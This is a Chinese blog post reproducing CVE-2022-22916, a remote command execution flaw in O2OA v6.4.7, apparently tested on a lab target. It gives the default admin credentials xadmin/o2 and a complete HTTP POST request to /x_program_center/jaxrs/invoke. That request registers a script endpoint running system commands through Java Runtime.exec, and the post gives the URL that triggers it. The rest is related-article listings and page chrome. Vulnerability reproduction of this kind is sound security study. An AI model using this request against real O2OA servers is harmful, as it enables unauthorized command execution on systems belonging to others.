O2OA RCE 远程命令执行漏洞复现(CVE-2022-22916)

最新推荐文章于 2024-02-04 16:10:29 发布
最新推荐文章于 2024-02-04 16:10:29 发布
阅读量989 收藏 2
点赞数 2
分类专栏: # 漏洞复现 文章标签: java 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/129833917
版权

1、产品简介

 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理、门户管理、信息管理、数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度。

2、漏洞概述

   O2OA是一个基于 J2EE 分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本,基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。通过/x_program_center/jaxrs/invoke 发现 020A v6.4.7 包含一个远程代码执行(RCE)漏洞。

3、影响范围

     020A v6.4.7

4、复现环境

       vulfocus在线靶场环境

 5、利用流程

  1、使用默认口令xadmin/o2登录后台,利用某大佬写的POC进行复现

     项目地址:O2OA-POC/POC.md at main · wendell1224/O2OA-POC · GitHub

 注意事项:大佬的POC里面应该是打错了,多打了一个 " / " ,所以导致添加的接口无法调用指令,删掉即可。

   bp抓包收集 Authorization字段信息

添加一个接口

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: [your target host]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: [your authorization]
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475
 
{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}

在这里插入图片描述

创建成功后访问接口执行系统命令

/x_program_center/jaxrs/invoke/cmd/execute

在这里插入图片描述

zxl2605
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22916
LiBai'S BLOG
05-24 2万+
CVE-2022-22916 CVE-2022-22916,O2OA RCE 远程命令执行 O2OA RCE 远程命令执行CVE-2022-22916) O2OA是一个基于J2EE分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。 通过 /x_program_center/jaxrs/invoke 发 O2OA v6.4.7 包含一个远程代码执行 (RCE) 漏洞。 第一步: 登
兰德网络-O2OA系统存在默认口令漏洞
nnn2188185的博客
04-12 686
浙江兰德纵横网路技术股份有限公司O2OA系统存在默认口令漏洞
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修了该漏洞漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行
VulfocusSpring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1601
VulfocusSpring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
Java 开源开发平台 O2OA V7.3 发布,新增带权限的全文检索等重要功能
liyi_hz2008的博客
01-11 1670
介绍的是 v7.3 版本的新功能和优化点
O2OA(翱途)开发平台 V8.1正式发布
liyi_hz2008的博客
09-01 489
其中重大的更新,是对系统安全进行加固,包括管理员初始化密码的配置,基于安全漏洞的扫描进行漏洞的修补,脆弱性进行分析并优化。2.增加X-XSS-Protection头信息,X-XSS-Protection头信息是用来防范XSS攻击的浏览器提供了许多可选的安全相关功能与特性,这些功能与特性通常可以通过 HTTP 响应头来控制,使用这些功能,可以避免受到浏览器端的用户受到类似 CSRF、XSS、Click Hijacking 等前端黑客攻击的影响。我们基于安全漏洞的扫描进行漏洞的修补,脆弱性进行分析并优化。
O2OA CVE-2022-22916
Purpose_7的博客
11-01 1014
O2OA CVE-2022-22916
漏洞库】O2OA系统
最新发布
weixin_46301214的博客
02-04 537
O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。O2OA系统 open 接口存在任意文件读取漏洞。O2OA open 后台任意文件读取漏洞
RCE远程命令、代码执行漏洞
qq_45680080的博客
11-13 1422
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提...
CVE-2022-22963 Demo
04-14
CVE-2022-22963 Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
O2OA开源免费开发平台:启用Eruda进行移动端调试
liyi_hz2008的博客
07-07 349
O2OA平台启用Eruda进行移动端调试 Eruda 是一个专为前端移动端、移动端设计的调试面板,类似Chrome DevTools 的迷你版(没有chrome强大 这个是可以肯定的),其主要功能包括:捕获 console 日志、检查元素状态、显示性能指标、捕获XHR请求、显示本地存储和 Cookie信息、浏览器特性检测等等。 https://github.com/liriliri/eruda/blob/master/doc/README_CN.md O2OA启用eruda 移动端页面加上debug
O2OA 稳定版 V4.2235 发布,功能性能等多方面优化升级
liyi_hz2008的博客
08-29 276
O2OA是基于J2EE架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发解决方案,对外提供专业的开发运维等技术服务。 标题 O2OA平台主要能力介绍: 流程管理:全功能流程引擎。基于任务驱动,开放式服务驱动,高灵活性、扩展性,事件定义丰富。包含人工、自动、拆分、合并、并行、定...
开源快速开发OA办公平台:O2OA平台是什么样的?
liyi_hz2008的博客
03-11 855
快速开发、用技术、组件、构件为特点的快速二次开发平台近年来一直都是热门需求中的热门,可以说已经成为了软件产业的的总体发展趋势。国家、政府的高度重视和国内开发市场需求量增加,让众多开发商们都加大了技术投入,国内快速开发平台的发展可以说是如火如荼。 缩短软件开发周期,降低开发成本,改善软件质量,最好的办法就是用,这是许多的IT项目所验证的一点。而二次开发平台正是利用了这样的理念,内置了许多成熟组件,不管是软件开发还是软件部署,都能被大大简化,做到最大程度上的降本增效。 O2OA开发平台是一个基.
java 开源表单营销,快速入门-常用表单脚本样例汇总
weixin_42303955的博客
03-10 125
一、两个下拉框联动功能二、实输入框模糊 查询 下拉选择样例1、前端脚本调用接口var data = "{}";var res=[];new Request({method:"post",async:false,url: o2.Actions.getHost("x_program_center") + "/x_program_center/jaxrs/invoke/getData/execute"...
任意文件读取漏洞详解
一个努力学习网安的小牛马
11-14 381
任意文件读取漏洞详解
漏洞 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7470
漏洞 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
cve-2022-22947漏洞原理
07-29
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞是Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。具体来说,当使用Spring Cloud Gateway的应用程序对外暴露了Gateway Actuator接口时,攻击者可以发送恶意请求,利用漏洞进行代码注入攻击,从而在远程主机上执行任意远程代码。这个漏洞的影响范围包括Spring Cloud Gateway 3.1.x < 3.1.1和Spring Cloud Gateway 3.0.x < 3.0.7版本,以及其他旧的、不受支持的Spring Cloud Gateway版本。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [Spring Cloud Gateway RCE漏洞原理分析与CVE-2022-22947)](https://blog.csdn.net/qq_49619863/article/details/127350543)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞](https://blog.csdn.net/weixin_45260839/article/details/124650584)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值